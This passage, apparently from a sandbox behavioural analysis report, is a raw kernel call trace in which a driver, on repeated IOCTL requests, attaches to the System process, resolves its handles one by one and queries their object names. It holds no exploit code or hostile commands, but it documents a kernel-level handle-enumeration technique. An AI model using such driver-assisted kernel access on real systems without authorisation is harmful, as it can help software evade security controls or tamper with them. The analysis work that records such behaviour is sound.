ProcessId=0x4, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0288.617] PsAcquireProcessExitSynchronization () returned 0x0 [0288.617] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400) [0288.617] ObReferenceObjectByHandle (in: Handle=0xffffffff800004b8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00067eec3a0, HandleInformation=0x0) returned 0x0 [0288.617] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0288.618] PsReleaseProcessExitSynchronization () returned 0x2 [0288.618] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f8c3 [0288.618] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006a2c5044, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a2c5044, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0288.618] ObfDereferenceObject (Object=0xffffe00067eec3a0) returned 0x7f1c [0288.618] IoCompleteRequest () returned 0x0 [0288.618] DeviceIoControl (in: hDevice=0x14c, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2810f0, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x2810f0*, lpBytesReturned=0x14d450*=0x84, lpOverlapped=0x0) returned 1 [0288.618] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0288.618] PsAcquireProcessExitSynchronization () returned 0x0 [0288.618] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400) [0288.618] ObReferenceObjectByHandle (in: Handle=0xffffffff800004bc, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe000697076c0, HandleInformation=0x0) returned 0x0 [0288.618] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0288.618] PsReleaseProcessExitSynchronization () returned 0x2 [0288.618] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f8c2 [0288.618] ObQueryNameString (in: Object=0xffffe000697076c0, ObjectNameInfo=0xffffe000692bf7c4, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe000692bf7c4, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0288.618] ObfDereferenceObject (Object=0xffffe000697076c0) returned 0x7ff9 [0288.618] IoCompleteRequest () returned 0x0 [0288.618] DeviceIoControl (in: hDevice=0x14c, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2810f0, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x2810f0*, lpBytesReturned=0x14d450*=0x84, lpOverlapped=0x0) returned 1 [0288.618] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0288.618] PsAcquireProcessExitSynchronization () returned 0x0 [0288.618] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400) [0288.618] ObReferenceObjectByHandle (in: Handle=0xffffffff800004c0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069709db0, HandleInformation=0x0) returned 0x0 [0288.618] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0288.618] PsReleaseProcessExitSynchronization () returned 0x2 [0288.618] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f8c1 [0288.618] ObQueryNameString (in: Object=0xffffe00069709db0, ObjectNameInfo=0xffffe0006a610704, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a610704, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0288.618] ObfDereferenceObject (Object=0xffffe00069709db0) returned 0x7ffc [0288.618] IoCompleteRequest () returned 0x0 [0288.618] DeviceIoControl (in: hDevice=0x14c, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2810f0, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x2810f0*, lpBytesReturned=0x14d450*=0x80, lpOverlapped=0x0) returned 1 [0288.618] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0288.618] PsAcquireProcessExitSynchronization () returned 0x0 [0288.618] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400) [0288.618] ObReferenceObjectByHandle (in: Handle=0xffffffff800004d4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006970e910, HandleInformation=0x0) returned 0x0 [0288.618] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0288.618] PsReleaseProcessExitSynchronization () returned 0x2 [0288.618] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f8c0 [0288.618] ObQueryNameString (in: Object=0xffffe0006970e910, ObjectNameInfo=0xffffe0006a5bc7c4, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a5bc7c4, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0288.618] ObfDereferenceObject (Object=0xffffe0006970e910) returned 0x7fff [0288.618] IoCompleteRequest () returned 0x0 [0288.618] DeviceIoControl (in: hDevice=0x14c, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2810f0, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x2810f0*, lpBytesReturned=0x14d450*=0x70, lpOverlapped=0x0) returned 1 [0288.619] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0288.619] PsAcquireProcessExitSynchronization () returned 0x0 [0288.619] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400) [0288.619] ObReferenceObjectByHandle (in: Handle=0xffffffff800004d8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069710c20, HandleInformation=0x0) returned 0x0 [0288.619] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0288.619] PsReleaseProcessExitSynchronization () returned 0x2 [0288.619] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f8bf [0288.619] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006913a404, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006913a404, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0288.619] ObfDereferenceObject (Object=0xffffe00069710c20) returned 0x7f16 [0288.619] IoCompleteRequest () returned 0x0 [0288.619] DeviceIoControl (in: hDevice=0x14c, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2810f0, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x2810f0*, lpBytesReturned=0x14d450*=0x7a, lpOverlapped=0x0) returned 1 [0288.619] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0288.619] PsAcquireProcessExitSynchronization () returned 0x0 [0288.620] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400) [0288.620] ObReferenceObjectByHandle (in: Handle=0xffffffff800004dc, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe000697108e0, HandleInformation=0x0) returned 0x0 [0288.620] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0288.620] PsReleaseProcessExitSynchronization () returned 0x2 [0288.620] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f8be [0288.620] ObQueryNameString (in: Object=0xffffe000697108e0, ObjectNameInfo=0xffffe00069121044, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe00069121044, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0288.620] ObfDereferenceObject (Object=0xffffe000697108e0) returned 0x7ff9 [0288.620] IoCompleteRequest () returned 0x0 [0288.620] DeviceIoControl (in: hDevice=0x14c, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2810f0, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x2810f0*, lpBytesReturned=0x14d450*=0x7a, lpOverlapped=0x0) returned 1 [0288.620] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0288.620] PsAcquireProcessExitSynchronization () returned 0x0 [0288.620] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400) [0288.620] ObReferenceObjectByHandle (in: Handle=0xffffffff800004e0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069710560, HandleInformation=0x0) returned 0x0 [0288.620] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0288.620] PsReleaseProcessExitSynchronization () returned 0x2 [0288.620] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f8bd [0288.620] ObQueryNameString (in: Object=0xffffe00069710560, ObjectNameInfo=0xffffe000694407c4, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe000694407c4, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0288.620] ObfDereferenceObject (Object=0xffffe00069710560) returned 0x7ffc [0288.620] IoCompleteRequest () returned 0x0 [0288.620] DeviceIoControl (in: hDevice=0x14c, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2810f0, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x2810f0*, lpBytesReturned=0x14d450*=0x9c, lpOverlapped=0x0) returned 1 [0288.620] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0288.620] PsAcquireProcessExitSynchronization () returned 0x0 [0288.620] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400) [0288.620] ObReferenceObjectByHandle (in: Handle=0xffffffff800004fc, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe000697b5db0, HandleInformation=0x0) returned 0x0 [0288.620] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0288.620] PsReleaseProcessExitSynchronization () returned 0x2 [0288.620] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f8bc [0288.620] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006a70c7c4, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a70c7c4, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0288.620] ObfDereferenceObject (Object=0xffffe000697b5db0) returned 0x7f1a [0288.620] IoCompleteRequest () returned 0x0 [0288.620] DeviceIoControl (in: hDevice=0x14c, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2810f0, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x2810f0*, lpBytesReturned=0x14d450*=0xa6, lpOverlapped=0x0) returned 1 [0288.620] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0288.620] PsAcquireProcessExitSynchronization () returned 0x0 [0288.620] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400) [0288.620] ObReferenceObjectByHandle (in: Handle=0xffffffff80000500, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe000697b4db0, HandleInformation=0x0) returned 0x0 [0288.620] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0288.620] PsReleaseProcessExitSynchronization () returned 0x2 [0288.620] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f8bb [0288.620] ObQueryNameString (in: Object=0xffffe000697b4db0, ObjectNameInfo=0xffffe0006904d7c4, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006904d7c4, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0288.620] ObfDereferenceObject (Object=0xffffe000697b4db0) returned 0x7ffa [0288.620] IoCompleteRequest () returned 0x0 [0288.621] DeviceIoControl (in: hDevice=0x14c, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2810f0, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x2810f0*, lpBytesReturned=0x14d450*=0xa6, lpOverlapped=0x0) returned 1 [0288.621] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0288.621] PsAcquireProcessExitSynchronization () returned 0x0 [0288.621] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400) [0288.626] ObReferenceObjectByHandle (in: Handle=0xffffffff80000504, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe000697b1740, HandleInformation=0x0) returned 0x0 [0288.627] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0288.627] PsReleaseProcessExitSynchronization () returned 0x2 [0288.627] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f8ba [0288.627] ObQueryNameString (in: Object=0xffffe000697b1740, ObjectNameInfo=0xffffe0006a2a5044, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a2a5044, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0288.627] ObfDereferenceObject (Object=0xffffe000697b1740) returned 0x7ffd [0288.627] IoCompleteRequest () returned 0x0 [0288.627] DeviceIoControl (in: hDevice=0x14c, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2810f0, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x2810f0*, lpBytesReturned=0x14d450*=0xf6, lpOverlapped=0x0) returned 1 [0288.627] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0288.627] PsAcquireProcessExitSynchronization () returned 0x0 [0288.627] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400) [0288.627] ObReferenceObjectByHandle (in: Handle=0xffffffff8000050c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe000696aac50, HandleInformation=0x0) returned 0x0 [0288.627] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0288.627] PsReleaseProcessExitSynchronization () returned 0x2 [0288.627] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f8b9 [0288.627] ObQueryNameString (in: Object=0xffffe000696aac50, ObjectNameInfo=0xffffe0006a9be044, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a9be044, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0288.627] ObfDereferenceObject (Object=0xffffe000696aac50) returned 0x7fff [0288.627] IoCompleteRequest () returned 0x0 [0288.627] DeviceIoControl (in: hDevice=0x14c, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2810f0, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x2810f0*, lpBytesReturned=0x14d450*=0x140, lpOverlapped=0x0) returned 1 [0288.627] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0288.627] PsAcquireProcessExitSynchronization () returned 0x0 [0288.627] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400) [0288.627] ObReferenceObjectByHandle (in: Handle=0xffffffff80000510, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069729f20, HandleInformation=0x0) returned 0x0 [0288.627] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0288.627] PsReleaseProcessExitSynchronization () returned 0x2 [0288.627] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f8b8 [0288.627] ObQueryNameString (in: Object=0xffffe00069729f20, ObjectNameInfo=0xffffe0006a6a57c4, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a6a57c4, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0288.627] ObfDereferenceObject (Object=0xffffe00069729f20) returned 0x7fff [0288.627] IoCompleteRequest () returned 0x0 [0288.627] DeviceIoControl (in: hDevice=0x14c, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2810f0, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x2810f0*, lpBytesReturned=0x14d450*=0x140, lpOverlapped=0x0) returned 1 [0288.627] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0288.627] PsAcquireProcessExitSynchronization () returned 0x0 [0288.627] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400) [0288.627] ObReferenceObjectByHandle (in: Handle=0xffffffff80000514, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006972dab0, HandleInformation=0x0) returned 0x0 [0288.627] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0288.627] PsReleaseProcessExitSynchronization () returned 0x2 [0288.627] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f8b7 [0288.627] ObQueryNameString (in: Object=0xffffe0006972dab0, ObjectNameInfo=0xffffe00069f22044, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe00069f22044, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0288.628] ObfDereferenceObject (Object=0xffffe0006972dab0) returned 0x7fff [0288.628] IoCompleteRequest () returned 0x0 [0288.628] DeviceIoControl (in: hDevice=0x14c, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2810f0, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x2810f0*, lpBytesReturned=0x14d450*=0x14, lpOverlapped=0x0) returned 1 [0288.628] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0288.628] PsAcquireProcessExitSynchronization () returned 0x0 [0288.628] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400) [0288.628] ObReferenceObjectByHandle (in: Handle=0xffffffff8000051c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069731090, HandleInformation=0x0) returned 0x0 [0288.628] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0288.628] PsReleaseProcessExitSynchronization () returned 0x2 [0288.628] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f8b6 [0288.628] ObQueryNameString (in: Object=0xffffe00069731090, ObjectNameInfo=0xffffe0006a4f5044, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a4f5044, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0288.628] ObfDereferenceObject (Object=0xffffe00069731090) returned 0x7ffe [0288.628] IoCompleteRequest () returned 0x0 [0288.628] DeviceIoControl (in: hDevice=0x14c, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2810f0, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x2810f0*, lpBytesReturned=0x14d450*=0x14, lpOverlapped=0x0) returned 1 [0288.628] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0288.628] PsAcquireProcessExitSynchronization () returned 0x0 [0288.628] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400) [0288.628] ObReferenceObjectByHandle (in: Handle=0xffffffff80000520, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069729170, HandleInformation=0x0) returned 0x0 [0288.628] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0288.628] PsReleaseProcessExitSynchronization () returned 0x2 [0288.628] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f8b5 [0288.628] ObQueryNameString (in: Object=0xffffe00069729170, ObjectNameInfo=0xffffe0006a65b044, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a65b044, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0288.628] ObfDereferenceObject (Object=0xffffe00069729170) returned 0x7fff [0288.628] IoCompleteRequest () returned 0x0 [0288.628] DeviceIoControl (in: hDevice=0x14c, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2810f0, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x2810f0*, lpBytesReturned=0x14d450*=0x7a, lpOverlapped=0x0) returned 1 [0288.628] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0288.628] PsAcquireProcessExitSynchronization () returned 0x0 [0288.628] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400) [0288.628] ObReferenceObjectByHandle (in: Handle=0xffffffff80000580, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006983af20, HandleInformation=0x0) returned 0x0 [0288.628] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0288.628] PsReleaseProcessExitSynchronization () returned 0x2 [0288.628] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f8b4 [0288.628] ObQueryNameString (in: Object=0xffffe0006983af20, ObjectNameInfo=0xffffe0006a6fa7c4, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a6fa7c4, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0288.628] ObfDereferenceObject (Object=0xffffe0006983af20) returned 0x7ffa [0288.628] IoCompleteRequest () returned 0x0 [0288.628] DeviceIoControl (in: hDevice=0x14c, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2810f0, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x2810f0*, lpBytesReturned=0x14d450*=0x70, lpOverlapped=0x0) returned 1 [0288.628] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0288.628] PsAcquireProcessExitSynchronization () returned 0x0 [0288.628] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400) [0288.629] ObReferenceObjectByHandle (in: Handle=0xffffffff80000588, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069838dd0, HandleInformation=0x0) returned 0x0 [0288.629] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0288.629] PsReleaseProcessExitSynchronization () returned 0x2 [0288.629] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f8b3 [0288.629] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006a5457c4, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a5457c4, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0288.629] ObfDereferenceObject (Object=0xffffe00069838dd0) returned 0x7f1e [0288.629] IoCompleteRequest () returned 0x0 [0288.629] DeviceIoControl (in: hDevice=0x14c, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2810f0, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x2810f0*, lpBytesReturned=0x14d450*=0x20, lpOverlapped=0x0) returned 1 [0288.629] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0288.629] PsAcquireProcessExitSynchronization () returned 0x0 [0288.629] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400) [0288.629] ObReferenceObjectByHandle (in: Handle=0xffffffff80000590, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe000698816c0, HandleInformation=0x0) returned 0x0 [0288.629] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0288.629] PsReleaseProcessExitSynchronization () returned 0x2 [0288.629] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f8b2 [0288.629] ObQueryNameString (in: Object=0xffffe000698816c0, ObjectNameInfo=0xffffe0006a4cf7c4, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a4cf7c4, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0288.629] ObfDereferenceObject (Object=0xffffe000698816c0) returned 